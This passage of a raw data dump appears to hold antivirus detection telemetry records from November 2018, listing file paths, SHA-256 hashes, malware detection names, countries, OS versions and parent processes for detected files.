dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='eetsqpnmt0.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\eeTsQpNmt0.exe', filesize=71984000, name='WORM/Lodbak.Gen.#M300.#R7829'), hash='94521c06bf99686d8902a798f7a102f120c49bd800b94d8b209a569ef7f4d690', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:08:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='prst.dll', filepath='F:\\Users\\X\\AppData\\Local\\Temp\\sega\\Prst.dll', filesize=128000, name='TR/SPY.KeyLogger.zakea.#M1.#R1'), hash='a5ed6f4644f888a56ed7c57c53fbb6f1f7a49454db4c09a58fc6617a29b7cb1f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:27:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='igdrcl32.dll', filepath='\\\\?\\E:\\easy driver\\Easy.Driver.Packs.v5.2.5.5.Win7.32-Bit\\Computer\\Video\\Intel1\\HD\\igdrcl32.dll', filesize=576000, name='W32/Ramnit.CD.#M1.#R1'), hash='ef23e4819cdface48078a39c3f85aa8287712fbb113f46a18c6f62f7b31f685c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:20:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='whbwxugn.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\WHBwXuGN.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:12:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xzhocuti.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\xZhoCuti.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:06:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lostfile_jpg_298720048.jpg', filepath='J:\\abdurrahman dai kurtarma\\F\\Lost File Results\\LostFile_JPG_298720048.jpg', filesize=20000, name='DR/FakePic.Gen.#M1.#R1'), hash='e6bb1606bfbebfcbe3b64da9c040159fc019a7bd34ff56bc385c995afd07d1e2', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ESET\\ESET NOD32 Antivirus\\x86\\ekrn.exe', parentsize=1353720, timestamp='2018-11-02T18:59:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110845-ce985c87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ecee166\\AVSCAN-20181102-110735-C33353C8\\AVSCAN-20181102-110845-CE985C87', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-192941-dfaf42ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-192912-DBAA71AF\\AVSCAN-20181102-192941-DFAF42EE', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='9a9e6683d5460ea4f6716b72b56ca888d7b455d36a42c69a01ed947adb0f0c9f', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:30:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gsdx32-sse4.dll', filepath='C:\\Users\\X\\Downloads\\pcsx2-v1.5.0-dev-2014-gb2a2a3a-windows-x86\\plugins\\GSdx32-SSE4.dll', filesize=2432000, name='W32/Ramnit.CD.#M1.#R1'), hash='e5c29a5aecab775d5e3321bd1499395d2cf38aedb326c533f348cc275a0a5ff2', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=815304, timestamp='2018-11-02T16:53:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tykptbsrfzj\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541098871.5bdb4d7731174', country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Free\\59248649.exe', parentsize=671232, timestamp='2018-11-02T05:25:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061300-452cdc50', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234137-7F763213\\AVSCAN-20181102-061300-452CDC50', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T03:16:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0049795.exe', filepath='F:\\System Volume Information\\_restore{008B42F0-35EB-4774-9CDD-66CB64DF5DF2}\\RP28\\A0049795.exe', filesize=768000, name='W32/Sality.AT.#M1.#R1'), hash='e84164404e79bcbf418d54064e013dde4451443d649cf50ef2fca4ba5626a6a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:24:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ospprearm.exe', filepath='C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE', filesize=92000, name='TR/Patched.Ren.Gen.#M300.#R3374'), hash='bb711e346d631cec6e4f4581eff9ae4cfbe3a29d9eb3260e9c94c2bf565112be', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:31:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000269ae', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp000269ae', filesize=18944000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='cad57c406d7e67275829282ab6993c7ad90b5f3886862cdbd6ab33b7bf863f7a', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T03:17:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-222106-91fe7313', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221829-7A5CEC69\\AVSCAN-20181102-222106-91FE7313', filesize=64000, name='TR/Siggen.64000.#M1.#R1'), hash='b6818febad1804ad62284091c33fe091df1ac21054495fd682540108b7386041', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:21:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3274040005.exe', filepath='F:\\scan-peta-wb-sp2010\\3274040\\3274040005\\3274040005.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T04:04:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130749-176c5fe3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-130457-03747F9B\\AVSCAN-20181102-130749-176C5FE3', filesize=128000, name='Adware/AD.Elex.wfnhx.#M1.#R1'), hash='a393a64f854d2cfefb2ce8d2af8cd047993e12258ca24c31ec3e54d6ebcff0f2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:05:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winmgmt.exe', filepath='d:\\windows\\system32\\wbem\\WinMgmt.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='b378e23d8aa36b296eb28b6839f6e51e4a07cbf18496ef2e02e22e8e6f6f42f0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:26:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3bm2veycarh\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:24:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adobexmp.dll', filepath='D:\\Program Files\\Adobe\\Acrobat 7.0\\Distillr\\AdobeXMP.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='bc58d677ba61f2b2b050ba4434ba1a2921524560e1440df2e3dd1a4ff8176347', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='F:\\DesktopLayer专杀.exe', parentsize=258048, timestamp='2018-11-04T13:36:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='drvmgt.dll', filepath='E:\\Games\\Red Alert2 Gold\\Red Alert2 Gold\\DRVMGT.DLL', filesize=256000, name='W32/Ramnit.CE.#M1.#R1'), hash='f5b768f377cb78da8a5f74b45c2488e049786af50c060e8027d1a5f9710290b4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=677024, timestamp='2018-11-04T23:19:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a6ba', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a6ba', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:59:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00295098', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00295098', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:55:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b630', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b630', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:15:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002963e8', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002963e8', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:21:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135810-c09497c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-135810-C09497C1', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:58:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150345-b2997e48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-150345-B2997E48', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:03:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297116', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297116', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:39:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00296753', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296753', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:26:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002912e6', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002912e6', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:47:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='intel-forced-audio-ntx64-2808_.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\IDM\\DwnlData\\kompie_3\\Intel-FORCED-Audio-NTx64-2808__717\\Intel-FORCED-Audio-NTx64-2808_.exe', filesize=232000, name='HEUR/AGEN.1034275.#M1.#R1'), hash='de33649b450676b98055770e6ce525debcf619b364799df4e7934ac3dfc468e0', metadata=Row(cmdline='\\\\\\/onboot', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe', parentsize=4091960, timestamp='2018-11-04T02:31:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-201455-24523a63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_351548e3\\AVSCAN-20181104-201321-169C74CA\\AVSCAN-20181104-201455-24523A63', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:15:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:04:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e08d639d2bd3fb736f0ef8f337ccffb26f749bd55d282f91d8493b2ad80ad160', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\E08D639D2BD3FB736F0EF8F337CCFFB26F749BD55D282F91D8493B2AD80AD160', filesize=1728000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='e08d639d2bd3fb736f0ef8f337ccffb26f749bd55d282f91d8493b2ad80ad160', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T09:07:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f48cc37dfee4705a56c224430b8bf84c3e6994dc14ff535bccfb69887b240639', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-16\\F48CC37DFEE4705A56C224430B8BF84C3E6994DC14FF535BCCFB69887B240639', filesize=256000, name='W32/Sivis.A.#M1.#R1'), hash='f48cc37dfee4705a56c224430b8bf84c3e6994dc14ff535bccfb69887b240639', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-16.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-17.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-18.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-19.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-20.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\archive.zip\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T06:01:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:37:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='reset l130 l220 l310 l360 l365 technodand.scr', filepath='F:\\RESET L130 L220 L310 L360 L365 TECHNODAND.SCR', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='fb3b95963fbca51b3c7f502365b13513ad711e4a9e3e0bc6c0526c56dbb17752', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1772072, timestamp='2018-11-01T00:20:57Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='20d8eee609bd1c6053b4d278f95aecefba2b7210bc971f0ae513ed2e0c644479', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\20D8EEE609BD1C6053B4D278F95AECEFBA2B7210BC971F0AE513ED2E0C644479', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='20d8eee609bd1c6053b4d278f95aecefba2b7210bc971f0ae513ed2e0c644479', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:02:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150347-27c104ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_729c5d97\\AVSCAN-20181102-150058-065517FA\\AVSCAN-20181102-150347-27C104EF', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='52abdb1845fad81e4249dbd4626ae74d637c37d893578f7d9d53aae05d438f5f', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:03:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2a7fc39d96c8b7aa8be1efd74c3ffb5e015e968c271ca4e66b59ed939f1ec5b2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2A7FC39D96C8B7AA8BE1EFD74C3FFB5E015E968C271CA4E66B59ED939F1EC5B2', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2a7fc39d96c8b7aa8be1efd74c3ffb5e015e968c271ca4e66b59ed939f1ec5b2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:44:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4159528\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:27:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kredit.pif', filepath='D:\\DOKUMENKU\\GABUNG KREDIT\\KREDIT\\KREDIT.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:25:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret_8bcd4d00_8d3d3483.exe', filepath='F:\\JDownloader\\Yamicsoft.Windows.10.Manager.v2.3.5\\URET\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET_8bcd4d00_8d3d3483.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:01:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='5ff5d685ddf30aa8399b22626da95c80e5019d9c513ff044df8ded8de1297b5b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\5FF5D685DDF30AA8399B22626DA95C80E5019D9C513FF044DF8DED8DE1297B5B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5ff5d685ddf30aa8399b22626da95c80e5019d9c513ff044df8ded8de1297b5b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:16:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pemilik.bat', filepath='D:\\DOKUMENKU\\SUBID APUPPT\\UKK\\GOL PEMILIK\\PEMILIK.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:29:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='5a835e53fb26d7d23cb817037d5497074a2a77677175b064871bf00c40cbe172', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\5A835E53FB26D7D23CB817037D5497074A2A77677175B064871BF00C40CBE172', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5a835e53fb26d7d23cb817037d5497074a2a77677175b064871bf00c40cbe172', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:20:46Z'), dt=datetime.date(2018, 11, 2)),
